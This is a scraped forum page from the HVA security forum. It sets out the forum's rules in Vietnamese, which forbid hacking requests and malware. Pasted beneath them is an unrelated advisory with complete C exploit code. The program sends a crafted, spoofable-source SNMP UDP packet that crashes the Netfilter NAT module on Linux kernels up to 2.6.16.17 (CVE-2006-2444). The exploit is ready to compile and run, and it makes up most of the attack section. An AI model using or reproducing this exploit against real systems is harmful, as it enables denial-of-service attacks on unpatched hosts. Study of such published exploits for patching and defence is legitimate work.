|
|
Nội quy diễn đàn HVA
I. Nội quy chung:
HVA là diễn đàn phi lợi nhuận, phi tôn giáo, phi chính trị. Diễn đàn được lập ra với mục đích chia sẻ, trao đổi kiến thức và kinh nghiệm. Để HVA là một nơi sinh hoạt lành mạnh và bổ ích, thành viên cần lưu ý những điểm như sau:
1. Các thành viên của diễn đàn phải tuyệt đối tuân theo luật pháp của nước CHXHCN Việt Nam và các quốc gia nơi họ cư ngụ.
2. Các thông tin, trao đổi trên diễn đàn không được mang nội dung thiếu lành mạnh, trái thuần phong mỹ tục của nước Việt Nam.
3. Các thông tin, trao đổi trên diễn đàn không được mang nội dung và ngôn ngữ có tính khích bác, bôi nhọ và lăng nhục.
4. Các thông tin, trao đổi trên diễn đàn không được mang nội dung chính trị, tôn giáo và sắc tộc.
5. Các thông tin, trao đổi trên diễn đàn phải tôn trọng vấn đề bản quyền.
6. Các thông tin, trao đổi trên diễn đàn không được dùng cho mục đích thương mại.
7. Các thông tin, trao đổi trên diễn đàn không được dùng cho mục đích phá hoại.
8. Những 'nickname' được dùng trên diễn đàn mang tính nhạy cảm sẽ bị khóa vĩnh viễn mà không cần báo trước.
Mọi tranh luận phải nằm trong khuôn khổ tin học và có trọng tâm là bảo mật. Những chủ đề vi phạm các điều khoản trên sẽ không được tiếp nhận trên diễn đàn HVA. HVA không chủ trương, không khuyến khích và không hỗ trợ mọi hình thức, hoạt động và thông tin bất hợp pháp. Những hoạt động này bao gồm việc thâm nhập, phá hoại các hệ thống máy tính cá nhân, máy chủ, trang web và các kết cấu hạ tầng mạng thông tin của các tổ chức, tập đoàn, cá nhân ở Việt Nam và quốc tế. Những hoạt động này không loại trừ việc trao đổi thông tin về thẻ tín dụng bất hợp pháp, phát tán thông tin thuộc về virus, bẻ khóa phần mềm và mọi thông tin mang tính dung hại khác.
II: Bổn phận và trách nhiệm:
Đối với Moderator:
Moderators là những thành viên của diễn đàn được đề cử để mang trách nhiệm điều hoạt diễn đàn.
Họ có trách nhiệm:
- Thường xuyên sinh hoạt.
- Theo dõi và điều hợp các chủ đề để duy trì nề nếp sinh hoạt của diễn đàn.
- Dời, chỉnh và xoá các chủ đề không thích hợp.
- Trả lời và giúp đỡ các thành viên những thắc mắc về cách sử dụng các chức năng của diễn đàn.
- Trả lời và giải quyết những thắc mắc, ý kiến, than phiền của thành viên.
Đối với member:
Members là những cá nhân đã đăng ký tài khoản và sinh hoạt ở HVA.
Họ có trách nhiệm:
- Tuân thủ nội quy chung đã đưa ra ở trên.
- Đọc và ghi nhận những thông báo trên diễn đàn.
- Tạo chủ đề, gởi thắc mắc, gởi trao đổi đúng nơi quy định.
- Tìm kiếm thông tin đã có trên diễn đàn trước khi tạo chủ đề mới.
- Tạo chủ đề và tiêu đề có nội dung rõ ràng, cụ thể.
- Gìn giữ tài khoản và cập nhật thông tin cá nhân (e-mail, thông tin liên lạc...) khi có những thay đổi.
- Tránh tham gia với nội dung mang tính chất tán gẫu trong các khu vực kỹ thuật.
- Tránh gởi chồng chất thắc mắc không phù hợp trong cùng một chủ đề.
- Tránh dùng diễn đàn làm phương tiện quảng cáo.
III: Quyền lợi:
Mọi thành viên có quyền tham gia sinh hoạt một cách bình đẳng trên diễn đàn.
Quyền lợi của moderator:
- Có quyền quyết định và xử lý những vấn đề vi phạm trên các box đã ấn định.
- Có quyền tham gia mọi chủ đề như những thành viên khác.
- Có quyền tham gia vào những chủ đề liên quan đến việc điều chỉnh, cải tiến, đường hướng sinh hoạt của diễn đàn.
Quyền lợi của member:
- Có quyền tham gia vào những box đã được ấn định.
- Có quyền đề đạt ý kiến nhằm nâng cao chất lượng sinh hoạt của diễn đàn.
- Có quyền phản ánh ý kiến cá nhân nhưng phải rõ ràng, rành mạch, có bằng chứng và có văn hóa.
- Có quyền đề đạt chính mình và những cá nhân khác cho công tác điều hợp.
IV. Quy định gởi bài:
- Bài viết phải gởi đúng box đã quy định, không được gởi trùng lặp.
- Tránh đặt tiêu đề què cụt, tối nghĩa như: help!!!!, cứu với, có ai biết...
- Tránh lạm dụng các ký tự cảm thán như: !!!!!!!!!!!!, ?????????????
- Tránh tạo ra những chủ đề như: dạy tôi cách hack pass. mail, dạy tôi hack pass. web... những chủ đề này sẽ bị xoá mà không cần báo trước.
- Diễn đàn có bộ gõ tiếng Việt, mọi trao đổi phải dùng tiếng Việt có dấu.
- Bài viết không được có nội dung phổ biến hoặc xin xỏ các chương trình virus, trojan, keylog nhằm mục đích tấn công và phá hoại người khác, trừ mục đích nghiên cứu bảo mật đã được chứng minh rõ ràng và cụ thể.
- Bài viết không được có nội dung mang tính bất hợp pháp như trao đổi thông tin thẻ tín dụng, đánh cắp mật khẩu, tấn công và tạo dung hại, trái pháp luật.
- Mỗi chủ đề nên phân loại rõ ràng, ví dụ:
Cho câu hỏi:
Câu hỏi: Tôi cần thông tin xyz...
Cho bài viết:
Bài viết: Các vấn đề xyz...
Cho bài dịch:
Bài dịch: Phân tích xyz - Dịch từ nguyên bản "xyz"...
Cho chủ đề mang tính thảo luận:
Thảo luận: Về việc xyz...
Cho các chủ đề mang tính thông tin:
Thông tin: Về biến cố xyz...
Các bài viết vi phạm sẽ bị xóa không cần báo trước.
Những tài khoản vi phạm sẽ được cảnh báo và bị vô hiệu hóa nếu tái phạm nhiều lần.
Các vi phạm nghiêm trọng sẽ dẫn đến việc tài khoản bị vô hiệu hoá.
Các tài khoản ngưng hoạt động sau sáu tháng sẽ không còn giá trị.
|
|
|
Improper handling of memory with Linux SNMP allows attackers to crash
NetFilter.
DETAILS
Vulnerable Systems:
* Linux kernel version 2.6.16.17 and prior
Immune Systems:
* Linux Kernel version 2.6.16.18
Exploit:
/*
* ecl-nf-snmpwn.c - 30/05/06
*
* Alex Behar <alex@ecl-labs.org>
* Yuri Gushin <yuri@ecl-labs.org>
*
* A patch review we did on the 2.6.16.17->18 Linux kernel source tree
revealed
* a restructuring of code in the snmp_parse_mangle() and the
snmp_trap_decode()
* functions. After further research it turned out to be a vulnerability
* previously reported[1] and assigned with CVE-2006-2444. For more
details,
* the version change log.
*
*
*
* 1) http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.18
*
* --
* Greets fly out to the ECL crew - Valentin Slavov, Dimityr Manevski.
* To stranger, shrink, the Console Pimps crew (blexim, ex0, hugin, w00f,
matt,
* kyu, kbd and the rest), our favorite soldier boy Sagi Horev, the SigMIL
crew,
* izik, tanin00, and everyone else we left out.
*
* P.S. - blexim, how are your FACECRABS ???? )))
*
*/
#ifndef _BSD_SOURCE
#define _BSD_SOURCE
#endif
#include <stdio.h>
#include <string.h>
#include <time.h>
#include <libnet.h>
void banner();
void usage(char *);
char pwnage[] = "\x30\x0a\x02\x01\x00\x04\x03\x45\x43\x4c\xa4\x00";
int main(int argc, char **argv)
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
int c;
u_char *buf;
int packet_len = 0;
struct ip *IP;
struct udphdr *UDP;
u_int32_t src = 0, dst = 0;
banner();
if (argc < 3) usage(argv[0]);
if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
exit(-1);
}
if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved source address.\n");
exit(-1);
}
if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
fprintf(stderr, "[!] Unresolved destination address.\n");
exit(-1);
}
if ((buf = malloc(IP_MAXPACKET)) == NULL) {
perror("malloc");
exit(-1);
}
UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);
packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;
srand(time(NULL));
IP = (struct ip *) buf;
IP->ip_v = 4; /* version 4 */
IP->ip_hl = 5; /* header length */
IP->ip_tos = 0; /* IP tos */
IP->ip_len = htons(packet_len); /* total length */
IP->ip_id = rand(); /* IP ID */
IP->ip_off = htons(0); /* fragmentation flags */
IP->ip_ttl = 64; /* time to live */
IP->ip_p = IPPROTO_UDP; /* transport protocol */
IP->ip_sum = 0;
IP->ip_src.s_addr = src;
IP->ip_dst.s_addr = dst;
UDP->uh_sport = rand();
UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
UDP->uh_sum = 0;
memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);
libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len -
LIBNET_IPV4_H);
if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1)
{
fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
exit(-1);
}
printf("[+] Packet sent.\n");
libnet_destroy(l);
free(buf);
return (0);
}
void usage(char *cmd)
{
printf("[!] Usage: %s <source> <destination> [port]\n", cmd);
exit(-1);
}
void banner()
{
printf("\t\tNetfilter NAT SNMP module DoS exploit\n"
"\t\t Yuri Gushin <yuri@ecl-labs.org>\n"
"\t\t Alex Behar <alex@ecl-labs.org>\n"
"\t\t\t ECL Team\n\n\n");
}
/* EoF */
|
|
|
|
|
|
|